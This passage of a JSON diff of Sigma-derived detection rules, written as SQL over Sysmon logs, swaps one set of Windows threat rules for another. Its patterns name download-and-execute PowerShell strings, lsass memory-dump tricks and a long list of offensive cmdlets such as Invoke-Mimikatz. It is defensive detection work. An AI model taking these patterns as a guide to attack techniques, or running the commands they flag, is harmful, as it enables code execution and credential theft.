'\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected 